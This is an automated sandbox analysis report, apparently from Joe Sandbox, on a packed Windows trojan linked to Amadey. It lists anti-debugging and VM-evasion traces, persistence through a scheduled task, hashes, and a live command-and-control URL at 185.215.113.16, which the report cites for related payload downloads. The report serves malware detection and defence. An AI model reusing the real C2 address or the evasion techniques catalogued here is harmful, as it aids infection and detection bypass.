                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201A2 second address: 4E201A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201A6 second address: 4E201BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F389CFCC94Eh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201BF second address: 4E201C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201C5 second address: 4E201C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201C9 second address: 4E201F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F389C8383A9h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201F3 second address: 4E201FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 58h 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E201FA second address: 4E20220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F389C8383A6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20220 second address: 4E2023C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC958h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2023C second address: 4E20242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20242 second address: 4E20246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20246 second address: 4E20311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F389C83839Ch 0x00000013 jmp 00007F389C8383A5h 0x00000018 popfd 0x00000019 pushad 0x0000001a mov edi, eax 0x0000001c pushfd 0x0000001d jmp 00007F389C83839Ah 0x00000022 add ax, 2E28h 0x00000027 jmp 00007F389C83839Bh 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f test esi, esi 0x00000031 pushad 0x00000032 call 00007F389C8383A4h 0x00000037 call 00007F389C8383A2h 0x0000003c pop esi 0x0000003d pop ebx 0x0000003e jmp 00007F389C8383A0h 0x00000043 popad 0x00000044 je 00007F390E9466D0h 0x0000004a jmp 00007F389C8383A0h 0x0000004f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F389C8383A7h 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20311 second address: 4E20317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20317 second address: 4E20342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F390E9466A2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F389C8383A9h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20342 second address: 4E20346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20346 second address: 4E2034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2034C second address: 4E2037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F389CFCC956h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [esi+44h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F389CFCC94Ah 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2037C second address: 4E20380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20380 second address: 4E20386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20386 second address: 4E203B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389C83839Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F389C8383A7h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E203B4 second address: 4E203DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edx, 2FB27D6Ch 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E203DF second address: 4E2043D instructions: 0x00000000 rdtsc 0x00000002 call 00007F389C8383A5h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F390E946624h 0x00000011 jmp 00007F389C8383A7h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a jmp 00007F389C8383A6h 0x0000001f jne 00007F390E946606h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2043D second address: 4E2045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F389CFCC959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2045A second address: 4E20460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10807 second address: 4E1080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1080B second address: 4E10811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10811 second address: 4E10829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F389CFCC954h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10829 second address: 4E1087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F389C83839Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F389C8383A0h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F389C8383A0h 0x0000001d and esp, FFFFFFF8h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F389C8383A7h 0x00000027 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1087F second address: 4E10899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b mov bh, C1h 0x0000000d pop eax 0x0000000e mov di, F456h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DDEA29 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F911DA instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DDC252 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 79EA29 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 9511DA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 79C252 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04EA00CF rdtsc 0_2_04EA00CF
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1240
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1247
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 408
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1255
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1243
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7600 Thread sleep count: 34 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7600 Thread sleep time: -68034s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7572 Thread sleep count: 1240 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7572 Thread sleep time: -2481240s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7588 Thread sleep count: 1247 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7588 Thread sleep time: -2495247s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7560 Thread sleep count: 408 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7560 Thread sleep time: -12240000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7676 Thread sleep time: -360000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7592 Thread sleep count: 1255 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7592 Thread sleep time: -2511255s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7596 Thread sleep count: 1243 > 30
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7596 Thread sleep time: -2487243s >= -30000s
                  Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.1829997144.0000000000F72000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1859556418.0000000000932000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
                  Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                  Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_05160BA6 Start: 05160C51 End: 05160C4D 5_2_05160BA6
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04EA00CF rdtsc 0_2_04EA00CF
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0076645B mov eax, dword ptr fs:[00000030h] 5_2_0076645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0076A1C2 mov eax, dword ptr fs:[00000030h] 5_2_0076A1C2
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 5_2_0074D312 cpuid 5_2_0074D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0074CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_0074CB1A
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_007365B0 LookupAccountNameA,5_2_007365B0

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 1.2.axplong.exe.730000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.axplong.exe.730000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1829925792.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.1789238154.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000003.2185572649.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000003.1819093932.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.1859481096.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: Command and Scripting Interpreter (2); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                  Persistence: Scheduled Task/Job (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Privilege Escalation: Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1); Compile After Delivery; Indicator Removal from Tools; HTML Smuggling
                  Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                  Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                  Source | Detection | Scanner | Label | Link
                  file.exe | 53% | ReversingLabs | Win32.Packed.Themida |
                  file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  file.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 53% | ReversingLabs | Win32.Packed.Themida |
                  No Antivirus matches
                  No Antivirus matches
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: malware | unknown
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518174
                  Start date and time:2024-09-25 13:51:18 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 3384 because there are no executed function
                  • Execution Graph export aborted for target file.exe, PID 2672 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.exe
                  Time | Type | Description
                  07:53:02 | API Interceptor | 1305996x Sleep call for process: axplong.exe modified
                  12:52:23 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  185.215.113.16 | file.exe | malicious | Amadey, Go Injector, XWorm | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | file.exe | malicious | Amadey, PureLog Stealer, RedLine, Stealc, zgRAT | 185.215.113.16/inc/newbundle2.exe
                  185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | jD6b7MZOhT.exe | malicious | Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine | 185.215.113.16/inc/XM.exe
                  185.215.113.16 | VtbX3CKBMT.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                  185.215.113.16 | UzOiLxrF4d.exe | malicious | Amadey, Neoreklami | 185.215.113.16/Jo89Ku7d/index.php
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  WHOLESALECONNECTIONSNL | wkoozurOWo.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | 86aY1jzemK.exe | malicious | Stealc, Vidar | 185.215.113.37
                  WHOLESALECONNECTIONSNL | iubXkDP5lk.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | yjzllYsjlU.exe | malicious | Amadey, Stealc | 185.215.113.103
                  WHOLESALECONNECTIONSNL | IWXaKkm4pm.exe | malicious | Stealc | 185.215.113.37
                  WHOLESALECONNECTIONSNL | p3aYwXKO5T.exe | malicious | Amadey | 185.215.113.43
                  WHOLESALECONNECTIONSNL | A1E1u0Rnel.exe | malicious | Amadey | 185.215.113.43
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Go Injector, XWorm | 185.215.113.16
                  WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                  No context
                  No context
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1965056
                  Entropy (8bit):7.9503823882866875
                  Encrypted:false
                  SSDEEP:49152:Zzuatph4L2H+Ug2sf77jALl77nXmwDdRAbh0SbTPsAEpKE:duqph4L2exT7MB77nXmwI7cF
                  MD5:48D34A4AC51F1A89E010B64FA8CFDCC2
                  SHA1:EF2A194FBB28562AFC735AE4EE74429521EF9105
                  SHA-256:AC848E3AF9A5738EF6791DAFA2A763A7718C25F1DF48A6430827CABE9A5D68F2
                  SHA-512:63FD4531148CA40FA60997692A79E678DCBC032153204CBB591831478AAEE70CDDE3B7568B8FDAE12F995BEB84C687BBCF23E094B2FA5E588BB531F0F7A50B28
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 53%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@.......................... N...........@.................................W...k.............................M...............................M..................................................... . ............................@....rsrc...............................@....idata ............................@... .@,.........................@...sfekpzlc......2.....................@...vvjbpxjb......M.....................@....taggant.0....M.."..................@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
